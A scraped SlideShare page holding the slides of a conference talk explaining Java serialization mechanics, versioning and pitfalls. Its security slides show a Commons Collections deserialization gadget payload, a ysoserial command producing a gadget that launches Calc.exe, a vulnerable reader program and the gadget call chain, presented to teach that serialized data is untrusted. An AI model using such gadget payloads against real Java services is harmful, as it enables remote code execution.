Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransfo rmerst.-[Lorg/apache/commons/collections/...
Agenda 1. What is (Java) Serialization? 2. How does Java Serialization work? 3. Common Pitfalls of Serialization 4. Summary
Martijn
 Dashorst topicus
Primary Education Student Information System 5k schools in NL 1M students 15k concurrent users ParnasSys
Java+HTML Server-side Component Oriented Web Framework for Applications Stateful Built with Apache Wicket
What is Java Serialization? part 1
serialization | sɪərɪəlʌɪˈzeɪʃ(ə)n | noun AC ED 00 05 73 72 00 1B 64 65 65 70 64 69 76 65 serialization deserialization ja...
Storage of objects
 Copying data
 Caching of data
 HTTP sessions
 Transmitting data/objects across network Why Serializati...
Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serializa...
Java Serialization in a nutshell class Foo implements Serializable { }
Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo();
Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo(); FileOutputStream fos = new Fil...
Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo(); FileOutputStream fos = new Fil...
Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo(); FileOutputStream fos = new Fil...
Java Serialization in a nutshell Written: 24 bytes 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 1 AC ED 00 05 73 72 00 03 46 6F 6...
Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"...
Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"...
Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"...
Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"...
Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serializa...
Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no...
class Foo implements Serializable { int f; } class Bar extends Foo { int b; } Bar bar1 = new Bar(); bar1.f = 123; bar1.b =...
class Foo implements Serializable { int f; } class Bar extends Foo { int b; } Which are true? bar2.f == 0 bar2.f == 123 ba...
class Foo { int f; } class Bar extends Foo implements Serializable { int b; } Bar bar1 = new Bar(); bar1.f = 123; bar1.b =...
class Foo { int f; } class Bar extends Foo implements Serializable { int b; } Which are true? bar2.f == 0 bar2.f == 123 ba...
Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no...
2. Identify (non-)serializable fields • primitive fields • String, Float, Double, ... • anything implementing Serializable o...
2. Identify (non-)serializable fields class Foo implements Serializable { private int count; private String name; private t...
2. Identify (non-)serializable fields class Foo implements Serializable { private transient int count = 1234; private Strin...
2. Identify (non-)serializable fields class UsingSerialPersistentFields implements Serializable { private int f = 123; priv...
Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no...
Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no...
3. Have access to no-args constructor of first non-serializable super class class Bar1 { Bar1(int b) { } } class Bar2 exten...
3. Have access to no-args constructor of first non-serializable super class class Bar1 { Bar1(int b) { } } class Bar2 exten...
Steps of Default Serialization class Foo implements Serializable { } ObjectOutputStream::writeObject(Object o)
Steps of Default Serialization 1. Object replacement = o.writeReplace(); class Foo implements Serializable { private Objec...
Steps of Default Serialization 1. Object replacement = o.writeReplace(); 2. replacement.writeObject(oos); class Foo implem...
Steps of Default Deserialization class Foo implements Serializable { } ObjectInputStream::readObject()
Steps of Default Deserialization 1. Object read = «newFoo»; class Foo implements Serializable { } ObjectInputStream::readO...
Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() class Foo implements Serializable { priva...
Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() 3. result = read.readResolve() class Foo ...
Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() 3. result = read.readResolve() 4. result....
Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() 3. result = read.readResolve() 4. result....
Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serializa...
Using writeReplace for Placeholders class NotActuallySerializable implements Serializable { private Object writeReplace() ...
Using readResolve for Singletons final class Serialization { public static final Serialization YAY = new JavaEE("Yay"); pu...
class Foo implements Serializable { static final Foo foo = new Foo(); private Object writeReplace() { return "Hello!"; } p...
class Foo implements Serializable { static final Foo foo = new Foo(); private Object writeReplace() { return "Hello!"; } p...
class Foo implements Serializable { private Object readResolve() { return "Hello!"; } } class Bar extends Foo { } oos.writ...
class Foo implements Serializable { private Object readResolve() { return "Hello!"; } } class Bar extends Foo { } oos.writ...
class CustomValues implements Serializable { private void writeObject(ObjectOutputStream oos) throws IOException { oos.def...
class CustomValues implements Serializable { private void writeObject(ObjectOutputStream oos) throws IOException { oos.def...
Externalizable public interface Externalizable extends Serializable { void writeExternal(ObjectOutput out) throws IOExcept...
ObjectInputValidation public interface ObjectInputValidation { public void validateObject() throws InvalidObjectException;...
Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serializa...
class Foobar implements Serializable { private static final long serialVersionUID = 1L; } It is strongly recommended that ...
It is strongly recommended that all serializable classes explicitly declare serialVersionUID values, since the default ser...
Deleting fields Can't go from Serializable → Externalizable Move classes up/down hierarchy Serializable field → Non-serializ...
Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serializa...
0000160: 6d65 723b 7870 7372 003a 6f72 672e 6170 mer;xpsr.:org.ap 0000170: 6163 6865 2e63 6f6d 6d6f 6e73 2e63 6f6c ache.co...
org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTr rmerst.-[Lorg/apache/commons/collections/Trans...
public class Main { public static void main(String[] args) throws Exception { File file = new File(args[0]); try ( FileInp...
$ java -jar ysoserial.jar CommonsCollections1 "Calc.exe" > gadget.ser public class Main { public static void main(String[]...
deserialization gadget chain ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet()...
org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransf rmerst.-[Lorg/apache/commons/collections/T...
Inner/nested classes CDI/Spring/Singletons part 2 Common Pitfalls of Java Serialization part 3
ApplicationScoped Spring beans Singletons Services @ApplicationScoped class FooService { void foo() {} } class Bar impleme...
ApplicationScoped Spring beans Singletons Services @ApplicationScoped class FooService { void foo() {} } class Bar impleme...
ApplicationScoped Spring beans Singletons Services @ApplicationScoped class FooService { void foo() {} } class Bar impleme...
Inner/nested classes CDI/Spring/Singletons part 2 Common Pitfalls of Java Serialization part 3
Inner/Nested classes class FooService { class Bar implements Serializable {} public Bar getBar() { return new Bar(); } } O...
Inner/Nested classes class FooService { class Bar implements Serializable {} public Bar getBar() { return new Bar(); } } O...
Inner/Nested classes class FooService { class Bar implements Serializable {} public Bar getBar() { return new Bar(); } } O...
Agenda 1. What is (Java) Serialization? 2. How does Java Serialization work? 3. Common Pitfalls of Serialization 4. Summary
Summary • Versatile • Flexible • Complete • Complex Java serialization is • Insecure Java deserialization is
performance considerations java XML/JAXB source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki
size considerations java XML/JAXB source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki
Java Serialization Deep Dive
Upcoming SlideShare
Loading in …5
×

Java Serialization Deep Dive

2,151 views

Published on

Java Serialization is often considered a dark art of Java programmers. This session will lift the veil and show what serialization is and isn't, how you can use it for profit and evil. After this session no NotSerializableException will be unconquerable.

Published in: Software
no profile picture user

  • Login to see the comments

Show More

Java Serialization Deep Dive

  1. 1. org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransfo rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons. collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp. ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.lan g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTransfo rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons. collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr Java Serialization Deep Dive Martijn Dashorst topicus
  2. 2. Agenda 1. What is (Java) Serialization? 2. How does Java Serialization work? 3. Common Pitfalls of Serialization 4. Summary
  3. 3. Martijn
 Dashorst topicus
  4. 4. Primary Education Student Information System 5k schools in NL 1M students 15k concurrent users ParnasSys
  5. 5. Java+HTML Server-side Component Oriented Web Framework for Applications Stateful Built with Apache Wicket
  6. 6. What is Java Serialization? part 1
  7. 7. serialization | sɪərɪəlʌɪˈzeɪʃ(ə)n | noun AC ED 00 05 73 72 00 1B 64 65 65 70 64 69 76 65 serialization deserialization java objects java objects
  8. 8. Storage of objects
 Copying data
 Caching of data
 HTTP sessions
 Transmitting data/objects across network Why Serialization?
  9. 9. Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serialization Work? part 2 Security
  10. 10. Java Serialization in a nutshell class Foo implements Serializable { }
  11. 11. Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo();
  12. 12. Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo(); FileOutputStream fos = new FileOutputStream("foo.ser");
  13. 13. Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo(); FileOutputStream fos = new FileOutputStream("foo.ser"); ObjectOutputStream oos = new ObjectOutputStream(fos);
  14. 14. Java Serialization in a nutshell class Foo implements Serializable { } Foo foo = new Foo(); FileOutputStream fos = new FileOutputStream("foo.ser"); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.write(foo);
  15. 15. Java Serialization in a nutshell Written: 24 bytes 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 1 AC ED 00 05 73 72 00 03 46 6F 6F 00 00 00 00 00 | ····sr··Foo····· | 2 00 00 01 02 00 00 78 70 | ······xp |
  16. 16. Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser");
  17. 17. Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"); ObjectInputStream ois = new ObjectInputStream(fis);
  18. 18. Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"); ObjectInputStream ois = new ObjectInputStream(fis); Object object = ois.readObject();
  19. 19. Java Serialization in a nutshell class Foo implements Serializable { } FileInputStream fis = new FileInputStream("foo.ser"); ObjectInputStream ois = new ObjectInputStream(fis); Foo foo = (Foo) ois.readObject();
  20. 20. Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serialization Work? part 2 Security
  21. 21. Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no-args constructor of first non-serializable superclass class Foo implements Serializable { private int count; private String name; private Thread thread; }
  22. 22. class Foo implements Serializable { int f; } class Bar extends Foo { int b; } Bar bar1 = new Bar(); bar1.f = 123; bar1.b = 456; ObjectOutputStream oos = new ... oos.write(bar1); ObjectInputStream ois = new ... Bar bar2 = (Bar) ois.readObject(); Which are true? bar2.f == 0 bar2.f == 123 bar2.b == 0 bar2.b == 456
  23. 23. class Foo implements Serializable { int f; } class Bar extends Foo { int b; } Which are true? bar2.f == 0 bar2.f == 123 bar2.b == 0 bar2.b == 456 Bar bar1 = new Bar(); bar1.f = 123; bar1.b = 456; ObjectOutputStream oos = new ... oos.write(bar1); ObjectInputStream ois = new ... Bar bar2 = (Bar) ois.readObject();
  24. 24. class Foo { int f; } class Bar extends Foo implements Serializable { int b; } Bar bar1 = new Bar(); bar1.f = 123; bar1.b = 456; ObjectOutputStream oos = new ... oos.write(bar1); ObjectInputStream ois = new ... Bar bar2 = (Bar) ois.readObject(); Which are true? bar2.f == 0 bar2.f == 123 bar2.b == 0 bar2.b == 456
  25. 25. class Foo { int f; } class Bar extends Foo implements Serializable { int b; } Which are true? bar2.f == 0 bar2.f == 123 bar2.b == 0 bar2.b == 456 Bar bar1 = new Bar(); bar1.f = 123; bar1.b = 456; ObjectOutputStream oos = new ... oos.write(bar1); ObjectInputStream ois = new ... Bar bar2 = (Bar) ois.readObject();
  26. 26. Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no-args constructor of first non-serializable superclass class Foo implements Serializable { private int count; private String name; private Thread thread; }
  27. 27. 2. Identify (non-)serializable fields • primitive fields • String, Float, Double, ... • anything implementing Serializable or Externalizable • static fields • fields of enum types • local (physical) resources connections, threads, file handles Serializable Not Serializable
  28. 28. 2. Identify (non-)serializable fields class Foo implements Serializable { private int count; private String name; private transient Thread thread; } Use transient keyword to mark fields not-serializable
  29. 29. 2. Identify (non-)serializable fields class Foo implements Serializable { private transient int count = 1234; private String name; private transient Thread thread; } ObjectInputStream ois = ... Foo foo = (Foo) ois.readObject(); assert foo.thread == null; assert foo.count == 0; Use transient keyword to mark fields non-serializable Upon de-serialization non- serializable fields are given a default value: 
 0, false, null
  30. 30. 2. Identify (non-)serializable fields class UsingSerialPersistentFields implements Serializable { private int f = 123; private int g = 456; private static final ObjectStreamField[] serialPersistentFields = { new ObjectStreamField( "f", Integer.TYPE) }; } Use serialPersistentFields to mark fields that are to be serialized Overrides transient keyword Must be private static final
  31. 31. Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no-args constructor of first non-serializable superclass class Foo { Foo() { } } class Bar extends Foo implements Serializable { } 👍
  32. 32. Rules of Default Serialization 1. Implement java.io.Serializable 2. Identify (non-)serializable fields 3. Have access to no-args constructor of first non-serializable superclass class Foo { Foo(int f) { } } class Bar extends Foo implements Serializable { } 🚫
  33. 33. 3. Have access to no-args constructor of first non-serializable super class class Bar1 { Bar1(int b) { } } class Bar2 extends Bar1 implements Serializable { Bar2() { super(1); } } Which are true? Serialization of bar2 succeeds Serialization of bar2 fails with NotSerializableException Deserialization of b2 succeeds Deserialization of b2 fails with InvalidClassException Bar2 bar2 = new Bar2(); oos.writeObject(bar2); Bar2 b2 = (Bar2) ois.readObject();
  34. 34. 3. Have access to no-args constructor of first non-serializable super class class Bar1 { Bar1(int b) { } } class Bar2 extends Bar1 implements Serializable { Bar2() { super(1); } } Which are true? Serialization of bar2 succeeds Serialization of bar2 fails with NotSerializableException Deserialization of b2 succeeds Deserialization of b2 fails with InvalidClassException Bar2 bar2 = new Bar2(); oos.writeObject(bar2); Bar2 b2 = (Bar2) ois.readObject();
  35. 35. Steps of Default Serialization class Foo implements Serializable { } ObjectOutputStream::writeObject(Object o)
  36. 36. Steps of Default Serialization 1. Object replacement = o.writeReplace(); class Foo implements Serializable { private Object writeReplace() { return this; } } ObjectOutputStream::writeObject(Object o)
  37. 37. Steps of Default Serialization 1. Object replacement = o.writeReplace(); 2. replacement.writeObject(oos); class Foo implements Serializable { private Object writeReplace() { return this; } private void writeObject( ObjectOutputStream out) { out.writeDefault(); } } ObjectOutputStream::writeObject(Object o)
  38. 38. Steps of Default Deserialization class Foo implements Serializable { } ObjectInputStream::readObject()
  39. 39. Steps of Default Deserialization 1. Object read = «newFoo»; class Foo implements Serializable { } ObjectInputStream::readObject()
  40. 40. Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() class Foo implements Serializable { private void readObject( ObjectInputStream in) { in.defaultReadObject(); } } ObjectInputStream::readObject()
  41. 41. Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() 3. result = read.readResolve() class Foo implements Serializable { private void readObject(...) { } private Object readResolve() { return this; } } ObjectInputStream::readObject()
  42. 42. Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() 3. result = read.readResolve() 4. result.validateObject() class Foo implements Serializable, ObjectInputValidation { private void readObject(...) {} private Object readResolve() {} private void validateObject() { } } ObjectInputStream::readObject()
  43. 43. Steps of Default Deserialization 1. Object read = «newFoo»; 2. read.readObject() 3. result = read.readResolve() 4. result.validateObject() 5. return result class Foo implements Serializable { private void readObject(...) {} private Object readResolve() {} private void validateObject() {} } ObjectInputStream::readObject()
  44. 44. Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serialization Work? part 2 Security
  45. 45. Using writeReplace for Placeholders class NotActuallySerializable implements Serializable { private Object writeReplace() { return new Placeholder(someValue); } public static NotActuallySerializable of(String value) { return ...; } } class Placeholder implements Serializable { private String value; private Object readResolve() { return NotActuallySerializable.of(value); } }
  46. 46. Using readResolve for Singletons final class Serialization { public static final Serialization YAY = new JavaEE("Yay"); public static final Serialization NAY = new JavaEE("Nay"); private final String value; private Serialization(String v) { this.value = v; } private Object readResolve() { if(value.equals("Yay")) return YAY; else return NAY; } }
  47. 47. class Foo implements Serializable { static final Foo foo = new Foo(); private Object writeReplace() { return "Hello!"; } private Object readResolve() { return foo; } } oos.writeObject(Foo.foo); Foo f1 = (Foo) ois.readObject(); readResolve/writeReplace Which is true? f1.equals("Hello!") f1 == Foo.foo f1 != Foo.foo Exception is thrown
  48. 48. class Foo implements Serializable { static final Foo foo = new Foo(); private Object writeReplace() { return "Hello!"; } private Object readResolve() { return foo; } } oos.writeObject(Foo.foo); Foo f1 = (Foo) ois.readObject(); readResolve/writeReplace Which is true? f1.equals("Hello!") f1 == Foo.foo f1 != Foo.foo Exception is thrown
  49. 49. class Foo implements Serializable { private Object readResolve() { return "Hello!"; } } class Bar extends Foo { } oos.writeObject(new Bar()); Object o = ois.readObject(); readResolve/writeReplace Which are true? o.equals("Hello!") o instanceof String o instanceof Bar Exception is thrown
  50. 50. class Foo implements Serializable { private Object readResolve() { return "Hello!"; } } class Bar extends Foo { } oos.writeObject(new Bar()); Object o = ois.readObject(); readResolve/writeReplace Which are true? o.equals("Hello!") o instanceof String o instanceof Bar Exception is thrown
  51. 51. class CustomValues implements Serializable { private void writeObject(ObjectOutputStream oos) throws IOException { oos.defaultWriteObject(); // write custom data } writeObject
  52. 52. class CustomValues implements Serializable { private void writeObject(ObjectOutputStream oos) throws IOException { oos.defaultWriteObject(); // write custom data } private void readObject(ObjectInputStream ois) throws ClassNotFoundException, IOException { ois.defaultReadObject(); // read custom data // initialize transient fields } } readObject writeObject
  53. 53. Externalizable public interface Externalizable extends Serializable { void writeExternal(ObjectOutput out) throws IOException; void readExternal(ObjectInput in) throws IOException, ClassNotFoundException; } Must implement java.io.Externalizable Must have public no-args constructor Implement both writeExternal() and readExternal()
  54. 54. ObjectInputValidation public interface ObjectInputValidation { public void validateObject() throws InvalidObjectException; } Allows the complete deserialized object graph to be validated before returning Should register with ObjectInputStream (in readObject): ois.registerValidation(this, 0); Performed after readResolve()
  55. 55. Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serialization Work? part 2 Security
  56. 56. class Foobar implements Serializable { private static final long serialVersionUID = 1L; } It is strongly recommended that all serializable classes explicitly declare serialVersionUID values, since the default serialVersionUID computation is highly sensitive to class details that may vary depending on compiler implementations, and can thus result in unexpected serialVersionUID conflicts during deserialization, causing deserialization to fail. Always provide serialVersionUID
  57. 57. It is strongly recommended that all serializable classes explicitly declare serialVersionUID values, since the default serialVersionUID computation is highly sensitive to class details that may vary depending on compiler implementations, and can thus result in unexpected serialVersionUID conflicts during deserialization, causing deserialization to fail. Always provide serialVersionUID class Foobar implements Serializable { private static final long serialVersionUID = 1L; } required!!!
  58. 58. Deleting fields Can't go from Serializable → Externalizable Move classes up/down hierarchy Serializable field → Non-serializable field (static/transient) primitive field type change Class → Enum or Enum → Class Remove Serializable/Externalizable Adding fields Adding classes Removing classes Adding write/readObject Adding Serializable Changing access modifiers for fields Non-Serializable field → serializable field Incompatible changes Compatible changes Change serialVersionUID Don't Change serialVersionUID
  59. 59. Default Java Serialization Custom Java Serialization Versioning Serialization in a nutshell part 2 How Does Java Serialization Work? part 2 Security
  60. 60. 0000160: 6d65 723b 7870 7372 003a 6f72 672e 6170 mer;xpsr.:org.ap 0000170: 6163 6865 2e63 6f6d 6d6f 6e73 2e63 6f6c ache.commons.col 0000180: 6c65 6374 696f 6e73 2e66 756e 6374 6f72 lections.functor 0000190: 732e 4368 6169 6e65 6454 7261 6e73 666f s.ChainedTransfo 00001a0: 726d 6572 30c7 97ec 287a 9704 0200 015b rmer0...(z.....[ 00001b0: 000d 6954 7261 6e73 666f 726d 6572 7374 ..iTransformerst 00001c0: 002d 5b4c 6f72 672f 6170 6163 6865 2f63 .-[Lorg/apache/c 00001d0: 6f6d 6d6f 6e73 2f63 6f6c 6c65 6374 696f ommons/collectio 00001e0: 6e73 2f54 7261 6e73 666f 726d 6572 3b78 ns/Transformer;x 00001f0: 7075 7200 2d5b 4c6f 7267 2e61 7061 6368 pur.-[Lorg.apach 0000200: 652e 636f 6d6d 6f6e 732e 636f 6c6c 6563 e.commons.collec 0000210: 7469 6f6e 732e 5472 616e 7366 6f72 6d65 tions.Transforme 0000220: 723b bd56 2af1 d834 1899 0200 0078 7000 r;.V*..4.....xp. 0000230: 0000 0573 7200 3b6f 7267 2e61 7061 6368 ...sr.;org.apach 0000240: 652e 636f 6d6d 6f6e 732e 636f 6c6c 6563 e.commons.collec 0000250: 7469 6f6e 732e 6675 6e63 746f 7273 2e43 tions.functors.C 0000260: 6f6e 7374 616e 7454 7261 6e73 666f 726d onstantTransform 0000270: 6572 5876 9011 4102 b194 0200 014c 0009 erXv..A......L.. 0000280: 6943 6f6e 7374 616e 7474 0012 4c6a 6176 iConstantt..Ljav 0000290: 612f 6c61 6e67 2f4f 626a 6563 743b 7870 a/lang/Object;xp 00002a0: 7672 0011 6a61 7661 2e6c 616e 672e 5275 vr..java.lang.Ru 00002b0: 6e74 696d 6500 0000 0000 0000 0000 0000 ntime........... 00002c0: 7870 7372 003a 6f72 672e 6170 6163 6865 xpsr.:org.apache 00002d0: 2e63 6f6d 6d6f 6e73 2e63 6f6c 6c65 6374 .commons.collect 00002e0: 696f 6e73 2e66 756e 6374 6f72 732e 496e ions.functors.In 00002f0: 766f 6b65 7254 7261 6e73 666f 726d 6572 vokerTransformer 0000300: 87e8 ff6b 7b7c ce38 0200 035b 0005 6941 ...k{|.8...[..iA Serialized data is readable
  61. 61. org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTr rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.com collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..j ang.Runtime...........xpsr.:org.apache.commons.collections.functors.Invoker former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/ g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~... ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G. ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..jav g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTr rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.com collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..j ang.Runtime...........xpsr.:org.apache.commons.collections.functors.Invoker former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/ g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~... ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G. ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..jav g.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.u ashMap......`....F..loadFactorI..thresholdxp?@......w.........xxvr..java.la erride...........xpq.~ Don't trust serialized data
  62. 62. public class Main { public static void main(String[] args) throws Exception { File file = new File(args[0]); try ( FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis);) { while (ois.available() >= 0) ois.readObject(); } } }
  63. 63. $ java -jar ysoserial.jar CommonsCollections1 "Calc.exe" > gadget.ser public class Main { public static void main(String[] args) throws Exception { File file = new File("gadget.ser") try ( FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis);) { while (ois.available() >= 0) ois.readObject(); } } } <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> java Main gadget.ser
  64. 64. deserialization gadget chain ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() LazyMap.get() ChainedTransformer.transform() ConstantTransformer.transform() InvokerTransformer.transform() Method.invoke() Class.getMethod() InvokerTransformer.transform() Method.invoke() Runtime.getRuntime() InvokerTransformer.transform() Method.invoke() Runtime.exec() org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransfo rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons. collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp. ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.lan g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTransfo rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons. collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp. ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.lan g.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.H ashMap......`....F..loadFactorI..thresholdxp?@......w.........xxvr..java.lang.Ov erride...........xpq.~ Y so seriAL
  65. 65. org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransf rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.fun tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java. ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTran former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Stri g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp.... ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..ja a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......v ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.la g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTransf rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.fun tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java. ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTran 